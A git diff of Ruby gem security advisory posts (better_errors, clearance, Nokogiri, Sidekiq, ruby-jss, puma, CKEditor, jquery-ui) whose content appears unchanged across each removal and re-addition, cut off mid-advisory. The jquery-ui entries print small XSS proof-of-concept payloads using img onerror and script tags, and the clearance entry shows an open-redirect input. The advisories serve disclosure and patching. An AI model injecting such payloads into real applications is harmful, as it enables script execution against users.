-    better_errors prior to 2.8.0 did not implement CSRF protection for its internal requests. It also did not enforce the correct "Content-Type" header for these requests, which allowed a cross-origin "simple request" to be made without CORS protection. These together left an application with better_errors enabled open to cross-origin attacks.
-
-    _As a developer tool, better_errors documentation strongly recommends addition only to the `development` bundle group, so this vulnerability should only affect development environments. Please ensure that your project limits better_errors to the `development` group (or the non-Rails equivalent)._
-
-    ### Patches
-    Starting with release 2.8.x, CSRF protection is enforced. It is recommended that you upgrade to the latest release, or minimally to "~> 2.8.3".
-
-    ### Workarounds
-    There are no known workarounds to mitigate the risk of using older releases of better_errors.
-
-    ### References
-    - Chris Moberly provided [an example attack that uses a now-patched vulnerability of webpack-dev-server in conjunction with Better Errors](https://about.gitlab.com/blog/2021/09/07/why-are-developers-vulnerable-to-driveby-attacks/)
-
-    ### For more information
-    If you have any questions or comments about this advisory, please
-    - Add to the [discussion in better_errors](https://github.com/BetterErrors/better_errors/discussions/507)
-    - Open an issue in [better_errors](https://github.com/BetterErrors/better_errors)
-  cvss_v3: 6.3
-  patched_versions:
-  - ">= 2.8.0"
----
+---
+layout: advisory
+title: 'CVE-2021-39197 (better_errors): Older releases of better_errors open to Cross-Site
+  Request Forgery attack'
+comments: false
+categories:
+- better_errors
+advisory:
+  gem: better_errors
+  cve: 2021-39197
+  ghsa: w3j4-76qw-wwjm
+  url: https://github.com/BetterErrors/better_errors/security/advisories/GHSA-w3j4-76qw-wwjm
+  title: Older releases of better_errors open to Cross-Site Request Forgery attack
+  date: 2021-09-07
+  description: |
+    ### Impact
+    better_errors prior to 2.8.0 did not implement CSRF protection for its internal requests. It also did not enforce the correct "Content-Type" header for these requests, which allowed a cross-origin "simple request" to be made without CORS protection. These together left an application with better_errors enabled open to cross-origin attacks.
+
+    _As a developer tool, better_errors documentation strongly recommends addition only to the `development` bundle group, so this vulnerability should only affect development environments. Please ensure that your project limits better_errors to the `development` group (or the non-Rails equivalent)._
+
+    ### Patches
+    Starting with release 2.8.x, CSRF protection is enforced. It is recommended that you upgrade to the latest release, or minimally to "~> 2.8.3".
+
+    ### Workarounds
+    There are no known workarounds to mitigate the risk of using older releases of better_errors.
+
+    ### References
+    - Chris Moberly provided [an example attack that uses a now-patched vulnerability of webpack-dev-server in conjunction with Better Errors](https://about.gitlab.com/blog/2021/09/07/why-are-developers-vulnerable-to-driveby-attacks/)
+
+    ### For more information
+    If you have any questions or comments about this advisory, please
+    - Add to the [discussion in better_errors](https://github.com/BetterErrors/better_errors/discussions/507)
+    - Open an issue in [better_errors](https://github.com/BetterErrors/better_errors)
+  cvss_v3: 6.3
+  patched_versions:
+  - ">= 2.8.0"
+---
diff --git a/advisories/_posts/2021-09-13-CVE-2021-23435.md b/advisories/_posts/2021-09-13-CVE-2021-23435.md
index 88c8ccda..d4a232ba 100644
--- a/advisories/_posts/2021-09-13-CVE-2021-23435.md
+++ b/advisories/_posts/2021-09-13-CVE-2021-23435.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2021-23435 (clearance): Open Redirect in clearance'
-comments: false
-categories:
-- clearance
-advisory:
-  gem: clearance
-  cve: 2021-23435
-  ghsa: 4hpq-rjcx-7vj9
-  url: https://github.com/advisories/GHSA-4hpq-rjcx-7vj9
-  title: Open Redirect in clearance
-  date: 2021-09-13
-  description: |
-    This affects the package clearance before 2.5.0. The vulnerability can
-    be possible when users are able to set the value of session[:return_to]. If the
-    value used for return_to contains multiple leading slashes (/////example.com) the
-    user ends up being redirected to the external domain that comes after the slashes
-    (http://example.com).
-  cvss_v3: 7.6
-  patched_versions:
-  - ">= 2.5.0"
----
+---
+layout: advisory
+title: 'CVE-2021-23435 (clearance): Open Redirect in clearance'
+comments: false
+categories:
+- clearance
+advisory:
+  gem: clearance
+  cve: 2021-23435
+  ghsa: 4hpq-rjcx-7vj9
+  url: https://github.com/advisories/GHSA-4hpq-rjcx-7vj9
+  title: Open Redirect in clearance
+  date: 2021-09-13
+  description: |
+    This affects the package clearance before 2.5.0. The vulnerability can
+    be possible when users are able to set the value of session[:return_to]. If the
+    value used for return_to contains multiple leading slashes (/////example.com) the
+    user ends up being redirected to the external domain that comes after the slashes
+    (http://example.com).
+  cvss_v3: 7.6
+  patched_versions:
+  - ">= 2.5.0"
+---
diff --git a/advisories/_posts/2021-09-27-CVE-2021-41098.md b/advisories/_posts/2021-09-27-CVE-2021-41098.md
index fd0a95c4..7cddfd8f 100644
--- a/advisories/_posts/2021-09-27-CVE-2021-41098.md
+++ b/advisories/_posts/2021-09-27-CVE-2021-41098.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2021-41098 (nokogiri): Improper Restriction of XML External Entity Reference
-  (XXE) in Nokogiri on JRuby'
-comments: false
-categories:
-- nokogiri
-- jruby
-advisory:
-  gem: nokogiri
-  platform: jruby
-  cve: 2021-41098
-  ghsa: 2rr5-8q37-2w7h
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-2rr5-8q37-2w7h
-  title: Improper Restriction of XML External Entity Reference (XXE) in Nokogiri on
-    JRuby
-  date: 2021-09-27
-  description: |
-    ### Severity
-
-    The Nokogiri maintainers have evaluated this as [**High Severity** 7.5 (CVSS3.0)](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C/MAV:N/MAC:L) for JRuby users. (This security advisory does not apply to CRuby users.)
-
-    ### Impact
-
-    In Nokogiri v1.12.4 and earlier, **on JRuby only**, the SAX parser resolves external entities by default.
-
-    Users of Nokogiri on JRuby who parse untrusted documents using any of these classes are affected:
-
-    - Nokogiri::XML::SAX::Parser
-    - Nokogiri::HTML4::SAX::Parser or its alias Nokogiri::HTML::SAX::Parser
-    - Nokogiri::XML::SAX::PushParser
-    - Nokogiri::HTML4::SAX::PushParser or its alias Nokogiri::HTML::SAX::PushParser
-
-    ### Mitigation
-
-    JRuby users should upgrade to Nokogiri v1.12.5 or later. There are no workarounds available for v1.12.4 or earlier.
-
-    CRuby users are not affected.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.12.5"
----
+---
+layout: advisory
+title: 'CVE-2021-41098 (nokogiri): Improper Restriction of XML External Entity Reference
+  (XXE) in Nokogiri on JRuby'
+comments: false
+categories:
+- nokogiri
+- jruby
+advisory:
+  gem: nokogiri
+  platform: jruby
+  cve: 2021-41098
+  ghsa: 2rr5-8q37-2w7h
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-2rr5-8q37-2w7h
+  title: Improper Restriction of XML External Entity Reference (XXE) in Nokogiri on
+    JRuby
+  date: 2021-09-27
+  description: |
+    ### Severity
+
+    The Nokogiri maintainers have evaluated this as [**High Severity** 7.5 (CVSS3.0)](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C/MAV:N/MAC:L) for JRuby users. (This security advisory does not apply to CRuby users.)
+
+    ### Impact
+
+    In Nokogiri v1.12.4 and earlier, **on JRuby only**, the SAX parser resolves external entities by default.
+
+    Users of Nokogiri on JRuby who parse untrusted documents using any of these classes are affected:
+
+    - Nokogiri::XML::SAX::Parser
+    - Nokogiri::HTML4::SAX::Parser or its alias Nokogiri::HTML::SAX::Parser
+    - Nokogiri::XML::SAX::PushParser
+    - Nokogiri::HTML4::SAX::PushParser or its alias Nokogiri::HTML::SAX::PushParser
+
+    ### Mitigation
+
+    JRuby users should upgrade to Nokogiri v1.12.5 or later. There are no workarounds available for v1.12.4 or earlier.
+
+    CRuby users are not affected.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.12.5"
+---
diff --git a/advisories/_posts/2021-10-06-CVE-2021-30151.md b/advisories/_posts/2021-10-06-CVE-2021-30151.md
index c96c89ea..988d2247 100644
--- a/advisories/_posts/2021-10-06-CVE-2021-30151.md
+++ b/advisories/_posts/2021-10-06-CVE-2021-30151.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2021-30151 (sidekiq): Cross-site Scripting in Sidekiq'
-comments: false
-categories:
-- sidekiq
-advisory:
-  gem: sidekiq
-  cve: 2021-30151
-  ghsa: grh7-935j-hg6w
-  url: https://github.com/advisories/GHSA-grh7-935j-hg6w
-  title: Cross-site Scripting in Sidekiq
-  date: 2021-10-06
-  description: |
-    Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue
-    name of the live-poll feature when Internet Explorer is used.
-  cvss_v3: 6.1
-  patched_versions:
-  - "~> 5.2.0"
-  - ">= 6.2.1"
----
+---
+layout: advisory
+title: 'CVE-2021-30151 (sidekiq): Cross-site Scripting in Sidekiq'
+comments: false
+categories:
+- sidekiq
+advisory:
+  gem: sidekiq
+  cve: 2021-30151
+  ghsa: grh7-935j-hg6w
+  url: https://github.com/advisories/GHSA-grh7-935j-hg6w
+  title: Cross-site Scripting in Sidekiq
+  date: 2021-10-06
+  description: |
+    Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue
+    name of the live-poll feature when Internet Explorer is used.
+  cvss_v3: 6.1
+  patched_versions:
+  - "~> 5.2.0"
+  - ">= 6.2.1"
+---
diff --git a/advisories/_posts/2021-10-06-CVE-2021-33575.md b/advisories/_posts/2021-10-06-CVE-2021-33575.md
index b65e96d6..42c84a5b 100644
--- a/advisories/_posts/2021-10-06-CVE-2021-33575.md
+++ b/advisories/_posts/2021-10-06-CVE-2021-33575.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2021-33575 (ruby-jss): Remote code execution in ruby-jss'
-comments: false
-categories:
-- ruby-jss
-advisory:
-  gem: ruby-jss
-  cve: 2021-33575
-  ghsa: vmfh-c547-v45h
-  url: https://github.com/advisories/GHSA-vmfh-c547-v45h
-  title: Remote code execution in ruby-jss
-  date: 2021-10-06
-  description: |
-    The Pixar ruby-jss gem before 1.6.0 allows remote attackers to execute
-    arbitrary code because of the Plist gem's documented behavior of using Marshal.load
-    during XML document processing.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.6.0"
----
+---
+layout: advisory
+title: 'CVE-2021-33575 (ruby-jss): Remote code execution in ruby-jss'
+comments: false
+categories:
+- ruby-jss
+advisory:
+  gem: ruby-jss
+  cve: 2021-33575
+  ghsa: vmfh-c547-v45h
+  url: https://github.com/advisories/GHSA-vmfh-c547-v45h
+  title: Remote code execution in ruby-jss
+  date: 2021-10-06
+  description: |
+    The Pixar ruby-jss gem before 1.6.0 allows remote attackers to execute
+    arbitrary code because of the Plist gem's documented behavior of using Marshal.load
+    during XML document processing.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.6.0"
+---
diff --git a/advisories/_posts/2021-10-12-CVE-2021-41136.md b/advisories/_posts/2021-10-12-CVE-2021-41136.md
index 866dc274..5833717c 100644
--- a/advisories/_posts/2021-10-12-CVE-2021-41136.md
+++ b/advisories/_posts/2021-10-12-CVE-2021-41136.md
@@ -1,54 +1,54 @@
----
-layout: advisory
-title: 'CVE-2021-41136 (puma): Inconsistent Interpretation of HTTP Requests (''HTTP
-  Request Smuggling'') in puma'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2021-41136
-  ghsa: 48w2-rm65-62xx
-  url: https://github.com/puma/puma/security/advisories/GHSA-48w2-rm65-62xx
-  title: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in
-    puma
-  date: 2021-10-12
-  description: |
-    ### Impact
-
-    Prior to `puma` version 5.5.0, using `puma` with a proxy which forwards LF characters as line endings could allow HTTP request smuggling. A client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client.
-
-    This behavior (forwarding LF characters as line endings) is very uncommon amongst proxy servers, so we have graded the impact here as "low". Puma is only aware of a single proxy server which has this behavior.
-
-    If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client.
-
-    ### Patches
-
-    This vulnerability was patched in Puma 5.5.1 and 4.3.9.
-
-    ### Workarounds
-
-    This vulnerability only affects Puma installations without any proxy in front.
-
-    Use a proxy which does not forward LF characters as line endings.
-
-    Proxies which do not forward LF characters as line endings:
-
-    * Nginx
-    * Apache (>2.4.25)
-    * Haproxy
-    * Caddy
-    * Traefik
-
-    ### Possible Breakage
-
-    If you are [dealing with legacy clients that want to send `LF` as a line ending](https://stackoverflow.com/questions/43574428/have-apache-accept-lf-vs-crlf-in-request-headers) in an HTTP header, this will cause those clients to receive a `400` error.
-
-    ### References
-
-    * [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)
-  cvss_v3: 3.7
-  patched_versions:
-  - "~> 4.3.9"
-  - ">= 5.5.1"
----
+---
+layout: advisory
+title: 'CVE-2021-41136 (puma): Inconsistent Interpretation of HTTP Requests (''HTTP
+  Request Smuggling'') in puma'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2021-41136
+  ghsa: 48w2-rm65-62xx
+  url: https://github.com/puma/puma/security/advisories/GHSA-48w2-rm65-62xx
+  title: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in
+    puma
+  date: 2021-10-12
+  description: |
+    ### Impact
+
+    Prior to `puma` version 5.5.0, using `puma` with a proxy which forwards LF characters as line endings could allow HTTP request smuggling. A client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client.
+
+    This behavior (forwarding LF characters as line endings) is very uncommon amongst proxy servers, so we have graded the impact here as "low". Puma is only aware of a single proxy server which has this behavior.
+
+    If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client.
+
+    ### Patches
+
+    This vulnerability was patched in Puma 5.5.1 and 4.3.9.
+
+    ### Workarounds
+
+    This vulnerability only affects Puma installations without any proxy in front.
+
+    Use a proxy which does not forward LF characters as line endings.
+
+    Proxies which do not forward LF characters as line endings:
+
+    * Nginx
+    * Apache (>2.4.25)
+    * Haproxy
+    * Caddy
+    * Traefik
+
+    ### Possible Breakage
+
+    If you are [dealing with legacy clients that want to send `LF` as a line ending](https://stackoverflow.com/questions/43574428/have-apache-accept-lf-vs-crlf-in-request-headers) in an HTTP header, this will cause those clients to receive a `400` error.
+
+    ### References
+
+    * [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)
+  cvss_v3: 3.7
+  patched_versions:
+  - "~> 4.3.9"
+  - ">= 5.5.1"
+---
diff --git a/advisories/_posts/2021-10-13-CVE-2021-26272.md b/advisories/_posts/2021-10-13-CVE-2021-26272.md
index e484761c..e91cae04 100644
--- a/advisories/_posts/2021-10-13-CVE-2021-26272.md
+++ b/advisories/_posts/2021-10-13-CVE-2021-26272.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2021-26272 (ckeditor): Inclusion of Functionality from Untrusted Control
-  Sphere in CKEditor 4'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2021-26272
-  ghsa: wpvm-wqr4-p7cw
-  url: https://ckeditor.com/blog/CKEditor-4.16-with-improved-image-pasting-High-Contrast-support-and-a-new-color-API/#security-comes-first
-  title: Inclusion of Functionality from Untrusted Control Sphere in CKEditor 4
-  date: 2021-10-13
-  description: |
-    It was possible to execute a ReDoS-type attack inside CKEditor 4 before
-    4.16 by persuading a victim to paste crafted URL-like text into the editor, and
-    then press Enter or Space (in the Autolink plugin).
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 5.1.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-26272
-    - https://ckeditor.com/blog/CKEditor-4.16-with-improved-image-pasting-High-Contrast-support-and-a-new-color-API/#security-comes-first
-    - https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-416
-    - https://www.oracle.com//security-alerts/cpujul2021.html
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://github.com/advisories/GHSA-wpvm-wqr4-p7cw
----
+---
+layout: advisory
+title: 'CVE-2021-26272 (ckeditor): Inclusion of Functionality from Untrusted Control
+  Sphere in CKEditor 4'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2021-26272
+  ghsa: wpvm-wqr4-p7cw
+  url: https://ckeditor.com/blog/CKEditor-4.16-with-improved-image-pasting-High-Contrast-support-and-a-new-color-API/#security-comes-first
+  title: Inclusion of Functionality from Untrusted Control Sphere in CKEditor 4
+  date: 2021-10-13
+  description: |
+    It was possible to execute a ReDoS-type attack inside CKEditor 4 before
+    4.16 by persuading a victim to paste crafted URL-like text into the editor, and
+    then press Enter or Space (in the Autolink plugin).
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26272
+    - https://ckeditor.com/blog/CKEditor-4.16-with-improved-image-pasting-High-Contrast-support-and-a-new-color-API/#security-comes-first
+    - https://github.com/ckeditor/ckeditor4/blob/major/CHANGES.md#ckeditor-416
+    - https://www.oracle.com//security-alerts/cpujul2021.html
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://github.com/advisories/GHSA-wpvm-wqr4-p7cw
+---
diff --git a/advisories/_posts/2021-10-26-CVE-2021-41182.md b/advisories/_posts/2021-10-26-CVE-2021-41182.md
index 241bc18b..957fe15d 100644
--- a/advisories/_posts/2021-10-26-CVE-2021-41182.md
+++ b/advisories/_posts/2021-10-26-CVE-2021-41182.md
@@ -1,72 +1,72 @@
----
-layout: advisory
-title: 'CVE-2021-41182 (jquery-ui-rails): XSS in the `altField` option of the Datepicker
-  widget in jquery-ui'
-comments: false
-categories:
-- jquery-ui-rails
-advisory:
-  gem: jquery-ui-rails
-  cve: 2021-41182
-  ghsa: 9gj3-hwp5-pmwc
-  url: https://github.com/jquery/jquery-ui/security/advisories/GHSA-9gj3-hwp5-pmwc
-  title: XSS in the `altField` option of the Datepicker widget in jquery-ui
-  date: 2021-10-26
-  description: |
-    ### Impact
-    Accepting the value of the `altField` option of the Datepicker
-    widget from untrusted sources may execute untrusted code. For
-    example, initializing the datepicker in the following way:
-    ```js
-    $("#datepicker").datepicker( {
-      altField: "<img onerror='doEvilThing()' src='/404' >",
-    } );
-    ```
-    will call the `doEvilThing` function.
-
-    ### Patches
-    The issue is fixed in jQuery UI 1.13.0. Any string value passed to
-    the `altField` option is now treated as a CSS selector.
-
-    ### Workarounds
-
-    A workaround is to not accept the value of the `altField` option
-    from untrusted sources.
-
-    ### For more information
-
-    If you have any questions or comments about this advisory, search
-    for a relevant issue in
-    [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues).
-    If you don't find an answer, open a new issue."
-  cvss_v2: 4.3
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 7.0.0"
-  related:
-    url:
-    - https://github.com/jquery/jquery-ui/security/advisories/GHSA-9gj3-hwp5-pmwc
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-41182
-    - https://github.com/jquery/jquery-ui/pull/1954/commits/6809ce843e5ac4128108ea4c15cbc100653c2b63
-    - https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/
-    - https://security.netapp.com/advisory/ntap-20211118-0004/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/
-    - https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html
-    - https://www.drupal.org/sa-contrib-2022-004
-    - https://www.drupal.org/sa-core-2022-002
-    - https://www.oracle.com/security-alerts/cpuapr2022.html
-    - https://www.tenable.com/security/tns-2022-09
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html
-    - https://github.com/advisories/GHSA-9gj3-hwp5-pmwc
-    - https://github.com/jquery-ui-rails/jquery-ui-rails/commit/413265e81f790f795239e07e7e25e01429b2f18d
----
+---
+layout: advisory
+title: 'CVE-2021-41182 (jquery-ui-rails): XSS in the `altField` option of the Datepicker
+  widget in jquery-ui'
+comments: false
+categories:
+- jquery-ui-rails
+advisory:
+  gem: jquery-ui-rails
+  cve: 2021-41182
+  ghsa: 9gj3-hwp5-pmwc
+  url: https://github.com/jquery/jquery-ui/security/advisories/GHSA-9gj3-hwp5-pmwc
+  title: XSS in the `altField` option of the Datepicker widget in jquery-ui
+  date: 2021-10-26
+  description: |
+    ### Impact
+    Accepting the value of the `altField` option of the Datepicker
+    widget from untrusted sources may execute untrusted code. For
+    example, initializing the datepicker in the following way:
+    ```js
+    $("#datepicker").datepicker( {
+      altField: "<img onerror='doEvilThing()' src='/404' >",
+    } );
+    ```
+    will call the `doEvilThing` function.
+
+    ### Patches
+    The issue is fixed in jQuery UI 1.13.0. Any string value passed to
+    the `altField` option is now treated as a CSS selector.
+
+    ### Workarounds
+
+    A workaround is to not accept the value of the `altField` option
+    from untrusted sources.
+
+    ### For more information
+
+    If you have any questions or comments about this advisory, search
+    for a relevant issue in
+    [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues).
+    If you don't find an answer, open a new issue."
+  cvss_v2: 4.3
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 7.0.0"
+  related:
+    url:
+    - https://github.com/jquery/jquery-ui/security/advisories/GHSA-9gj3-hwp5-pmwc
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41182
+    - https://github.com/jquery/jquery-ui/pull/1954/commits/6809ce843e5ac4128108ea4c15cbc100653c2b63
+    - https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/
+    - https://security.netapp.com/advisory/ntap-20211118-0004/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/
+    - https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html
+    - https://www.drupal.org/sa-contrib-2022-004
+    - https://www.drupal.org/sa-core-2022-002
+    - https://www.oracle.com/security-alerts/cpuapr2022.html
+    - https://www.tenable.com/security/tns-2022-09
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.fedoraproject.org/archives/list/package-announce
+    - https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html
+    - https://github.com/advisories/GHSA-9gj3-hwp5-pmwc
+    - https://github.com/jquery-ui-rails/jquery-ui-rails/commit/413265e81f790f795239e07e7e25e01429b2f18d
+---
diff --git a/advisories/_posts/2021-10-26-CVE-2021-41183.md b/advisories/_posts/2021-10-26-CVE-2021-41183.md
index 52e9d361..6742e0d9 100644
--- a/advisories/_posts/2021-10-26-CVE-2021-41183.md
+++ b/advisories/_posts/2021-10-26-CVE-2021-41183.md
@@ -1,81 +1,81 @@
----
-layout: advisory
-title: 'CVE-2021-41183 (jquery-ui-rails): XSS in `*Text` options of the Datepicker
-  widget in jquery-ui'
-comments: false
-categories:
-- jquery-ui-rails
-advisory:
-  gem: jquery-ui-rails
-  cve: 2021-41183
-  ghsa: j7qv-pgf6-hvh4
-  url: https://github.com/jquery/jquery-ui/security/advisories/GHSA-j7qv-pgf6-hvh4
-  title: XSS in `*Text` options of the Datepicker widget in jquery-ui
-  date: 2021-10-26
-  description: |
-    ### Impact
-    Accepting the value of various `*Text` options of the Datepicker
-    widget from untrusted sources may execute untrusted code. For example, initializing
-    the datepicker in the following way:
-    ```js
-    $("#datepicker").datepicker( {
-      showButtonPanel: true,
-      showOn: "both",
-      closeText: "<script>doEvilThing('closeText XSS')</script>",
-      currentText: "<script>doEvilThing('currentText XSS')</script>",
-      prevText: "<script>doEvilThing('prevText XSS')</script>",
-      nextText: "<script>doEvilThing('nextText XSS')</script>",
-      buttonText: "<script>doEvilThing('buttonText XSS')</script>",
-      appendText: "<script>doEvilThing('appendText XSS')</script>",
-      }
-    );
-    ```
-    will call `doEvilThing` with 6 different parameters coming from
-    all `*Text` options.
-
-    ### Patches
-    The issue is fixed in jQuery UI 1.13.0. The values passed to various
-    `*Text` options are now always treated as pure text, not HTML.
-
-    ### Workarounds
-    A workaround is to not accept the value of the `*Text` options from
-    untrusted sources.
-
-    ### For more information
-    If you have any questions or comments about this advisory, search
-    for a relevant issue in
-    [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues).
-    If you don't find an answer, open a new issue.
-  cvss_v2: 4.3
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 7.0.0"
-  related:
-    url:
-    - https://github.com/jquery/jquery-ui/security/advisories/GHSA-j7qv-pgf6-hvh4
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-41183
-    - https://github.com/jquery/jquery-ui/pull/1953
-    - https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/
-    - https://bugs.jqueryui.com/ticket/15284
-    - https://security.netapp.com/advisory/ntap-20211118-0004/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/
-    - https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html
-    - https://www.drupal.org/sa-contrib-2022-004
-    - https://www.drupal.org/sa-core-2022-001
-    - https://www.drupal.org/sa-core-2022-002
-    - https://www.oracle.com/security-alerts/cpuapr2022.html
-    - https://www.tenable.com/security/tns-2022-09
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.fedoraproject.org/archives/list/package-announce
-    - https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html
-    - https://github.com/advisories/GHSA-j7qv-pgf6-hvh4
-    - https://github.com/jquery-ui-rails/jquery-ui-rails/commit/413265e81f790f795239e07e7e25e01429b2f18d
----
+---
+layout: advisory
+title: 'CVE-2021-41183 (jquery-ui-rails): XSS in `*Text` options of the Datepicker
+  widget in jquery-ui'
+comments: false
+categories:
+- jquery-ui-rails
+advisory:
+  gem: jquery-ui-rails
+  cve: 2021-41183
+  ghsa: j7qv-pgf6-hvh4
+  url: https://github.com/jquery/jquery-ui/security/advisories/GHSA-j7qv-pgf6-hvh4
+  title: XSS in `*Text` options of the Datepicker widget in jquery-ui
+  date: 2021-10-26
+  description: |
+    ### Impact
+    Accepting the value of various `*Text` options of the Datepicker
+    widget from untrusted sources may execute untrusted code. For example, initializing
+    the datepicker in the following way:
+    ```js
+    $("#datepicker").datepicker( {
+      showButtonPanel: true,
+      showOn: "both",
+      closeText: "<script>doEvilThing('closeText XSS')</script>",
+      currentText: "<script>doEvilThing('currentText XSS')</script>",
+      prevText: "<script>doEvilThing('prevText XSS')</script>",
+      nextText: "<script>doEvilThing('nextText XSS')</script>",
+      buttonText: "<script>doEvilThing('buttonText XSS')</script>",
+      appendText: "<script>doEvilThing('appendText XSS')</script>",
+      }
+    );
+    ```
+    will call `doEvilThing` with 6 different parameters coming from
+    all `*Text` options.
+
+    ### Patches
+    The issue is fixed in jQuery UI 1.13.0. The values passed to various
+    `*Text` options are now always treated as pure text, not HTML.
+
+    ### Workarounds
